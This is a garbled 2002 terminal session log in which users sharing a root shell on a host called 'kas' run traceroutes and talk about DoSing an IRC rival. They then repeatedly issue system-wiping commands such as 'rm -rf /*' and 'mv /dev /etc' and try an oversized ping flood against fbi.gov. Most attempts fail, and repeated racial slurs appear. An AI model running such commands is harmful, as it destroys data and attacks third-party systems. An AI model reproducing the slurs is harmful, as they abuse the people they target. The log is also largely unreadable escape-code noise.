 1  203.214.248.1 (203.214.248.1)  0.294 ms  0.239 ms  0.232 ms
 2  dcr01-g5-0.mlbn01.exodus.net (64.15.32.57)  0.195 ms  0.166 ms  0.161 ms
 3  ibr02-g6-0.mlbn01.exodus.net (64.15.32.17)  0.267 ms  0.213 ms  0.198 ms
 4  POS0-1-0.mb1.optus.net.au (203.202.149.173)  1.048 ms  0.892 ms  0.875 ms
 5  POS5-0.sg2.optus.net.au (202.139.124.81)  13.446 ms  13.343 ms  13.643 ms
 6  iar1-sonet2-3-0-0.Sydney.cw.net (166.63.229.25)  172.436 ms  172.611 ms  17
1[H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45C.837 ms
[H[4h                                   
[4lfcae.acast.nova.edu
[4h                                   
[4l157.238.46.35
[4h                                   
[4lredpanda.jp
[4h                                   
                                   
                                   
                                   
                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4lis fcae stil li386
[4h                                   
[4lyep
[4h                                   
[4llet's dos the guy taht took the nic
[4h                                   
[4lroot@kas:/home/bob# unless u have b
[4h                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4l| bob (uridas@NS1.1115.NET) (Intern
[4h                                   
[4lheh wtf host is that
[4h                                   
[4lroot@kas:/home/bob# traceroute NS1.
[4h                                   
[4ltraceroute to NS1.1115.NET (64.56.1
[4h                                   [34D[4l1  203.214.248.1 (203.214.248.1)
[4h                                   [34D[4l2  dcr01-g5-0.mlbn01.exodus.net (6
[4h                                   [34D[4l3  ibr02-g6-0.mlbn01.exodus.net (6
[4h                                   [34D[4l4  POS0-1-0.mb1.optus.net.au (203.
[4h                                   [34D[4l5  POS5-0.sg2.optus.net.au (202.13
[4h                                   [34D[4l6  iar1-sonet2-3-0-0.Sydney.cw.net
[4h                                   
[4l 7  bcr2.Sydney.cw.net (166.63.226.62)  172.23 ms  172.491 ms  172.444 ms
 8  208.172.145.201 (208.172.145.201)  175.318 ms  176.797 ms  175.642 ms
 9  acr2-loopback.Cleveland.cw.net (208.172.210.62)  231.192 ms  231.396 ms  23
1[H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45C.837 ms
[35P
[35P
[35P[45C.285 ms
[H[4h                                   
                                   
                                   
                                   
                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4lis fcae stil li386
[4h                                   
[4lyep
[4h                                   
[4llet's dos the guy taht took the nic
[4h                                   
[4lroot@kas:/home/bob# unless u have b
[4h                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4l| bob (uridas@NS1.1115.NET) (Intern
[4h                                   
[4lheh wtf host is that
[4h                                   
[4lroot@kas:/home/bob# traceroute NS1.
[4h                                   
[4ltraceroute to NS1.1115.NET (64.56.1
[4h                                   [34D[4l1  203.214.248.1 (203.214.248.1)
[4h                                   [34D[4l2  dcr01-g5-0.mlbn01.exodus.net (6
[4h                                   [34D[4l3  ibr02-g6-0.mlbn01.exodus.net (6
[4h                                   [34D[4l4  POS0-1-0.mb1.optus.net.au (203.
[4h                                   [34D[4l5  POS5-0.sg2.optus.net.au (202.13
[4h                                   [34D[4l6  iar1-sonet2-3-0-0.Sydney.cw.net
[4h                                   [34D[4l7  bcr2.Sydney.cw.net (166.63.226.
[4h                                   [34D[4l8  208.172.145.201 (208.172.145.20
[4h                                   [34D[4l9  acr2-loopback.Cleveland.cw.net
[4h                                   
[4l10  oarnet.Cleveland.cw.net (208.172.209.130)  234.561 ms  234.818 ms  234.7
76 m[H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45C.837 ms
[35P
[35P
[35P[45C.285 ms
[35P[45Cs
[H[4h                                   
                                   
                                   
                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4lis fcae stil li386
[4h                                   
[4lyep
[4h                                   
[4llet's dos the guy taht took the nic
[4h                                   
[4lroot@kas:/home/bob# unless u have b
[4h                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4l| bob (uridas@NS1.1115.NET) (Intern
[4h                                   
[4lheh wtf host is that
[4h                                   
[4lroot@kas:/home/bob# traceroute NS1.
[4h                                   
[4ltraceroute to NS1.1115.NET (64.56.1
[4h                                   [34D[4l1  203.214.248.1 (203.214.248.1)
[4h                                   [34D[4l2  dcr01-g5-0.mlbn01.exodus.net (6
[4h                                   [34D[4l3  ibr02-g6-0.mlbn01.exodus.net (6
[4h                                   [34D[4l4  POS0-1-0.mb1.optus.net.au (203.
[4h                                   [34D[4l5  POS5-0.sg2.optus.net.au (202.13
[4h                                   [34D[4l6  iar1-sonet2-3-0-0.Sydney.cw.net
[4h                                   [34D[4l7  bcr2.Sydney.cw.net (166.63.226.
[4h                                   [34D[4l8  208.172.145.201 (208.172.145.20
[4h                                   [34D[4l9  acr2-loopback.Cleveland.cw.net
[4h                                   
[4l10  oarnet.Cleveland.cw.net (208.17
[4h                                   
[4l11  sotc3-atm5-0-0s40.columbus.oar.net (199.18.103.105)  234.855 ms  234.799
 ms [H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45C.837 ms
[35P
[35P
[35P[45C.285 ms
[35P[45Cs
[35P[46C234.814 ms
[H[4h                                   
                                   
                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4lis fcae stil li386
[4h                                   
[4lyep
[4h                                   
[4llet's dos the guy taht took the nic
[4h                                   
[4lroot@kas:/home/bob# unless u have b
[4h                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4l| bob (uridas@NS1.1115.NET) (Intern
[4h                                   
[4lheh wtf host is that
[4h                                   
[4lroot@kas:/home/bob# traceroute NS1.
[4h                                   
[4ltraceroute to NS1.1115.NET (64.56.1
[4h                                   [34D[4l1  203.214.248.1 (203.214.248.1)
[4h                                   [34D[4l2  dcr01-g5-0.mlbn01.exodus.net (6
[4h                                   [34D[4l3  ibr02-g6-0.mlbn01.exodus.net (6
[4h                                   [34D[4l4  POS0-1-0.mb1.optus.net.au (203.
[4h                                   [34D[4l5  POS5-0.sg2.optus.net.au (202.13
[4h                                   [34D[4l6  iar1-sonet2-3-0-0.Sydney.cw.net
[4h                                   [34D[4l7  bcr2.Sydney.cw.net (166.63.226.
[4h                                   [34D[4l8  208.172.145.201 (208.172.145.20
[4h                                   [34D[4l9  acr2-loopback.Cleveland.cw.net
[4h                                   
[4l10  oarnet.Cleveland.cw.net (208.17
[4h                                   
[4l11  sotc3-atm5-0-0s40.columbus.oar.
[4h                                   
[4l12  dlp1-atm2-0.dayton.oar.net (199.18.202.101)  553.558 ms  457.838 ms  438
.301[H[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P
[35P[45C.837 ms
[35P
[35P
[35P[45C.285 ms
[35P[45Cs
[35P[46C234.814 ms
[35P[46Cms
[H[4h                                   
                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4lis fcae stil li386
[4h                                   
[4lyep
[4h                                   
[4llet's dos the guy taht took the nic
[4h                                   
[4lroot@kas:/home/bob# unless u have b
[4h                                   
[4lroot@kas:/home/bob# tail
[4h                                   
[4l| bob (uridas@NS1.1115.NET) (Intern
[4h                                   
[4lheh wtf host is that
[4h                                   
[4lroot@kas:/home/bob# traceroute NS1.
[4h                                   
[4ltraceroute to NS1.1115.NET (64.56.1
[4h                                   [34D[4l1  203.214.248.1 (203.214.248.1)
[4h                                   [34D[4l2  dcr01-g5-0.mlbn01.exodus.net (6
[4h                                   [34D[4l3  ibr02-g6-0.mlbn01.exodus.net (6
[4h                                   [34D[4l4  POS0-1-0.mb1.optus.net.au (203.
[4h                                   [34D[4l5  POS5-0.sg2.optus.net.au (202.13
[4h                                   [34D[4l6  iar1-sonet2-3-0-0.Sydney.cw.net
[4h                                   [34D[4l7  bcr2.Sydney.cw.net (166.63.226.
[4h                                   [34D[4l8  208.172.145.201 (208.172.145.20
[4h                                   [34D[4l9  acr2-loopback.Cleveland.cw.net
[4h                                   
[4l10  oarnet.Cleveland.cw.net (208.17
[4h                                   
[4l11  sotc3-atm5-0-0s40.columbus.oar.
[4h                                   
[4l12  dlp1-atm2-0.dayton.oar.net (199
[4h                                   
[4l13  lowfat.donet.com (205.133.113.128)  238.16 ms  237.578 ms  238.05 ms
14  timmay.donet.com (64.56.101.210)  240.24 ms  240.336 ms  239.982 ms
15  NS1.1115.NET (64.56.106.202)  240.219 ms  239.79 ms  239.874 ms
root@kas:/home/bob# cd   ]2;screen]2;   Wuff  ----  Wuff!!  ]2;screen]2;glen@fr
an.fifthavenuevideo.com: /home/glenhrmm wtf    ?
root@kas:/home/bob# who do u want 2 dos?
root@kas:/home/bob# i dont care
root@kas:/home/bob# do it 
root@kas:/home/bob# 
root@kas:/home/bob# !!!!
root@kas:/home/bob# im not dossing no 1 from here foo hehe
root@kas:/home/bob# login to mad dos networksz!!@#!@#
root@kas:/home/bob# windows boxes away!!!
root@kas:/home/bob# hrmm u dont sound normal
root@kas:/home/bob# u bob ?
root@kas:/home/bob# yes
root@kas:/home/bob# ?
root@kas:/home/bob# ?
root@kas:/home/bob# ?
root@kas:/home/bob# how much # $ did u send me ?
root@kas:/home/bob# $1
root@kas:/home/bob# 1k
root@kas:/home/bob# no  wron
root@kas:/home/bob# g
bash: g: command not found
root@kas:/home/bob# 
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[1] 20031
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20035
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20036
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20037
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20038
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# enohup rm -rf /* >/dev/null &
[2] 20040
bash: enohup: command not found
[2]+  Exit 127                enohup rm -rf /* >/dev/null
root@kas:/home/bob# xinohup rm -rf /* >/dev/null &
[2] 20041
bash: xinohup: command not found
[2]+  Exit 127                xinohup rm -rf /* >/dev/null
root@kas:/home/bob# t
bash: t: command not found
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20043
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20044
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20045
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# enohup rm -rf /* >/dev/null &
[2] 20047
bash: enohup: command not found
[2]+  Exit 127                enohup rm -rf /* >/dev/null
root@kas:/home/bob# xit
bash: xit: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20049
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20050
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20051
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[3] 20053
bash: /usr/bin/nohup: bad interpreter: No such file or directory
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]-  Exit 126                nohup rm -rf /* >/dev/null
[3]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20055
root@kas:/home/bob# bash: /usr/bin/nohup: bad interpreter: No such file or dire
c
exoitnohup rm -rf /* >/dev/null &
[3] 20058
bash: exoitnohup: command not found
[2]   Exit 126                nohup rm -rf /* >/dev/null
[3]+  Exit 127                exoitnohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20060
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20062
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20064
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20065
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20068
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20069
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# nohup rm -rf /* >/dev/null &
[2] 20070
bash: /usr/bin/nohup: bad interpreter: No such file or directory
[2]+  Exit 126                nohup rm -rf /* >/dev/null
root@kas:/home/bob# rm -rf / &
[2] 20071
bash: /bin/rm: No such file or directory
[2]+  Exit 127                rm -rf /
root@kas:/home/bob# 
root@kas:/home/bob# akfsjhdafdsj
bash: akfsjhdafdsj: command not found
root@kas:/home/bob# ajfds
bash: ajfds: command not found
root@kas:/home/bob# a
bash: a: command not found
root@kas:/home/bob# fs
bash: fs: command not found
root@kas:/home/bob# dasdf
bash: dasdf: command not found
root@kas:/home/bob# asd
bash: asd: command not found
root@kas:/home/bob# f
bash: f: command not found
root@kas:/home/bob# asdf
bash: asdf: command not found
root@kas:/home/bob# a
bash: a: command not found
root@kas:/home/bob# fdsasfd
bash: fdsasfd: command not found
root@kas:/home/bob# a
bash: a: command not found
root@kas:/home/bob# fds
bash: fds: command not found
root@kas:/home/bob# asf
bash: asf: command not found
root@kas:/home/bob# asd
bash: asd: command not found
root@kas:/home/bob# fafds
bash: fafds: command not found
root@kas:/home/bob# asfd
bash: asfd: command not found
root@kas:/home/bob# asdf
bash: asdf: command not found
root@kas:/home/bob# afd
bash: afd: command not found
root@kas:/home/bob# af
bash: af: command not found
root@kas:/home/bob# drm -rf &
[2] 20099
bash: drm: command not found
[2]+  Exit 127                drm -rf
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# njdskhfakjdshfasf
bash: njdskhfakjdshfasf: command not found
root@kas:/home/bob# as
fdasfdj
rmf -r f rm -rf /* >/dev/null &


;ljadfljasf
root@kas:/home/bob# r
bash: r: command not found
root@kas:/home/bob# m -rf /* &
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* &
bash: /bin/rm: No such file or directory
[2] 20117
[2]+  Exit 127                rm -rf /*
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* &
[2] 20119
bash: /bin/rm: No such file or directory
[2]+  Exit 127                rm -rf /*
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* &
[2] 20120
bash: /bin/rm: No such file or directory
[2]+  Exit 127                rm -rf /*
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* &

root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* &
bash: /bin/rm: No such file or directory
[2] 20121
[2]   Exit 127                rm -rf /*
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /* >/dev/null &
[2] 20122
bash: /bin/rm: No such file or directory
[2]+  Exit 127                rm -rf /* >/dev/null
root@kas:/home/bob# rm -rf /* >/dev/null &
[2] 20124
bash: /bin/rm: No such file or directory
root@kas:/home/bob# rm -rf /* >/dev/null &
[3] 20125
bash: /bin/rm: No such file or directory
[2]   Exit 127                rm -rf /* >/dev/null
[3]+  Exit 127                rm -rf /* >/dev/null
root@kas:/home/bob# rm -rf /* >/dev/null &
[2] 20126
bash: /bin/rm: No such file or directory
[2]+  Exit 127                rm -rf /* >/dev/null
root@kas:/home/bob# r rm -rf 
bash: /bin/rm: No such file or directory
root@kas:/home/bob# /w
bash: /w: No such file or directory
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /*
bash: /bin/rm: No such file or directory
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm
bash: /bin/rm: No such file or directory
root@kas:/home/bob# 
root@kas:/home/bob#  -rf /*
bash: -rf: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# rm -rf /
bash: /bin/rm: No such file or directory
root@kas:/home/bob# rm -rf /rm -rf /rm -rf /cd /
bash: /bin/rm: No such file or directory
root@kas:/home/bob# rm -rf *
bash: /bin/rm: No such file or directory
root@kas:/home/bob# hahahahah
bash: hahahahah: command not found
root@kas:/home/bob# U =- WNOED
bash: U: command not found
root@kas:/home/bob# mHAv /dev /etc &
[2] 20152
bash: mHAv: command not found
[2]+  Exit 127                mHAv /dev /etc
root@kas:/home/bob# H
bash: H: command not found
root@kas:/home/bob# DFmv /dev /etc &AL;
[2] 20154
bash: DFmv: command not found
bash: AL: command not found
[2]+  Exit 127                DFmv /dev /etc
root@kas:/home/bob# mv /dev /etc &H
[2] 20156
bash: mv: command not found
bash: H: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# FSmv /dev /etc &LA
[2] 20158
bash: FSmv: command not found
bash: LA: command not found
[2]+  Exit 127                FSmv /dev /etc
root@kas:/home/bob# JHFD
bash: JHFD: command not found
root@kas:/home/bob# mv /dev /etc &AD
[2] 20161
bash: mv: command not found
bash: AD: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# Smv /dev /etc &
[2] 20163
bash: Smv: command not found

[2]+  Exit 127                Smv /dev /etc
root@kas:/home/bob# 
root@kas:/home/bob# F
bash: F: command not found
root@kas:/home/bob# SDC >
bash: syntax error near unexpected token `>'
root@kas:/home/bob#  mv /dev /etc &
[2] 20165
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# mv /dev /etc &*
[2] 20166
bash: mv: command not found
bash: a.out: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# mv /dev /etc &S
[2] 20168
bash: mv: command not found
bash: S: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# D
bash: D: command not found
root@kas:/home/bob# mv /dev /etc &C > w*
[2] 20171
bash: mv: command not found
bash: C: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# 
root@kas:/home/bob# w
S  7:26pm  up 48 days,  3:24, 12 users,  load average: 0.74, 0.31, 0.21
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     pts/0    d442-pad-mel.alp  3:22pm  1:38m  0.06s  0.06s  -bash 
carl     pts/4    d252-ps4-mel.alp  6:07pm 20.00s  0.03s  0.00s  screen -r 
root     pts/9    d252-ps4-mel.alp  7:07pm 22.00s  0.23s  0.19s  ssh -l bob loc
a
root     pts/10   d442-pad-mel.alp  3:06pm  1:55m  0.09s  0.09s  -bash 
linbsd   pts/11   linbsd.net        5:50am 11:04m  0.07s  0.07s  -bash 
bob      pts/14   localhost         7:07pm 22.00s  0.04s  0.00s  screen -x 
root     pts/16   d252-ps4-mel.alp  6:31pm  6.00s  0.10s  0.10s  -bash 
bob      pts/17   mystic.uprising.  6:32pm  0.00s  0.05s  0.00s  screen -x 
bob      pts/18   61.129.67.238     6:33pm  0.00s  0.04s  0.01s  screen -x 
root     pts/19   localhost         7:00pm  0.00s  2.67s  0.05s  w 
bob      pts/20   mystic.uprising.  7:04pm  3:20   0.08s  0.08s  -bash 
root     pts/21   d252-ps4-mel.alp  7:11pm 18.00s  0.05s  0.05s  -bash 
root@kas:/home/bob# Sw
bash: Sw: command not found
root@kas:/home/bob# Dw
bash: Dw: command not found
root@kas:/home/bob# Cw 
bash: Cw: command not found
root@kas:/home/bob# >*
bash: *: ambiguous redirect
root@kas:/home/bob# SA;KJFDA;LSJFA;LSJF;LAJFLJDASFL;AJDFS;LlsJHAS;FLKJAS;DL
bash: SA: command not found
bash: KJFDA: command not found
bash: LSJFA: command not found
bash: LSJF: command not found
bash: LAJFLJDASFL: command not found
bash: AJDFS: command not found
bash: LlsJHAS: command not found
bash: FLKJAS: command not found
Fbash: DL: command not found
root@kas:/home/bob# FKJASD;
bash: FKJASD: command not found
root@kas:/home/bob# JFlASLsDKJF
bash: JFlASLsDKJF: command not found
root@kas:/home/bob# ALSDJFLls
bash: ALSDJFLls: command not found
root@kas:/home/bob# AJF
bash: AJF: command not found
root@kas:/home/bob# AS
bash: AS: command not found
root@kas:/home/bob# FDJASDKFJA;LSJFD;LJDFA'SJDF
> AJDSFAJSFD
> ASF
> AS
> FASDF
> ASHYFUASJ
> FAS
Broadcast message from root (pts/21) Mon Jan 14 19:27:03 2002...


The system is going down for reboot NOW !!

]2;screen]2;   Wuff  ----  Wuff!!  Broadcast message from root (pts/21) Mon Jan
 14 19:27:03 2002...

The system is going down for reboot NOW !!
NIGGEAR
> NIG]2;screen]2;glen@fran.fifthavenuevideo.com: /home/glenGER
> NIsGG
> ER
> lsG
> NIGGER
> NIGGER
> NIGmv /dev /etc &G
> mEv /dev /etc &
> R
> 
> mv /dev /etc &
> NImv /dev /etc &
> GGER
> SDC
root@kas:/home/bob#  >*
bash: *: ambiguous redirect
root@kas:/home/bob# SCDC >
bash: syntax error near unexpected token `>'
root@kas:/home/bob# *mv /dev /etc &
[2] 20200
bash: *mv: command not found
[2]+  Exit 127                *mv /dev /etc
root@kas:/home/bob# mv /dev /etc &
[2] 20201
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# 
root@kas:/home/bob# mv /dev /etc &
[2] 20202
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# 
root@kas:/home/bob# mv /dev /etc &S
[2] 20203
bash: mv: command not found
bash: S: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# mv /dev /etc &
[2] 20205
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# mv /dev /etc &D
[2] 20206
bash: mv: command not found
bash: D: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# mv /dev /etc &
[2] 20208
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# C 
bash: C: command not found
root@kas:/home/bob# mv /dev /etc &
[2] 20210
bash: mv: command not found
[2]+  Exit 127                mv /dev /etc
root@kas:/home/bob# >mv /dev /etc &*
[2] 20211
bash: /dev: is a directory
bash: a.out: command not found
[2]+  Exit 126                /dev /etc >mv
root@kas:/home/bob# SDC >*JASKFDJASDRMRJ-FJFSLADMFL;AJF
bash: SDC: command not found
bash: AJF: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# RM RJ-F NIGGER
bash: RM: command not found
root@kas:/home/bob# SDC >*
bash: *: ambiguous redirect
root@kas:/home/bob# SDCF. AU
bash: SDCF.: command not found
root@kas:/home/bob# SDpCing -s 8000 fbi.gov &
[2] 20219
bash: SDpCing: command not found
[2]+  Exit 127                SDpCing -s 8000 fbi.gov
root@kas:/home/bob# ping -s 8000 fbi.gov &.
[2] 20220
bash: ping: command not found
bash: .: filename argument required
.: usage: . filename
[2]+  Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# ping -s 8000 fbi.gov &
[2] 20221
bash: ping: command not found
[2]+  Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# 
root@kas:/home/bob# AUping -s 8000 fbi.gov &
[2] 20222
bash: AUping: command not found
[2]+  Exit 127                AUping -s 8000 fbi.gov
root@kas:/home/bob# ping -s 8000 fbi.gov &

bash: ping: command not found
[2] 20223
[2]   Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# 
root@kas:/home/bob# ping -s 8000 fbi.gov &
[2] 20224
bash: ping: command not found
[2]+  Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# 
root@kas:/home/bob# ping -s 8000 fbi.gov &S
[2] 20226
bash: ping: command not found
bash: S: command not found
[2]+  Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# ping -s 8000 fbi.gov &
[2] 20228
bash: ping: command not found
[2]+  Exit 127                ping -s 8000 fbi.gov
root@kas:/home/bob# D.CAU
bash: D.CAU: command not found
root@kas:/home/bob# SDC.AU
bash: SDC.AU: command not found
root@kas:/home/bob# SDC.AU
bash: SDC.AU: command not found
root@kas:/home/bob# SDCF.AU
bash: SDCF.AU: command not found
root@kas:/home/bob# ASDC.AUw
bash: ASDC.AUw: command not found
root@kas:/home/bob# tSDC.AU
bash: tSDC.AU: command not found
root@kas:/home/bob# 
root@kas:/home/bob# Nig
root@kas:/home/bob# 
root@kas:/home/bob# g
root@kas:/home/bob# er
bash: er: command not found
root@kas:/home/bob# na
root@kas:/home/bob# 
root@kas:/home/bob# l
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# dskhfa;slhfd
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# al
root@kas:/home/bob# hfd
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# la
root@kas:/home/bob# 
root@kas:/home/bob# jhdsfla
root@kas:/home/bob# s
root@kas:/home/bob# 
root@kas:/home/bob# jf
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# lajsfdl;asjdfl
root@kas:/home/bob# a
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# jfd
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 

root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# ps 
root@kas:/home/bob# 
root@kas:/home/bob# -au
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# x
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# p
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# z
root@kas:/home/bob#  
root@kas:/home/bob# 
root@kas:/home/bob# -
root@kas:/home/bob# a
root@kas:/home/bob# 
root@kas:/home/bob# u
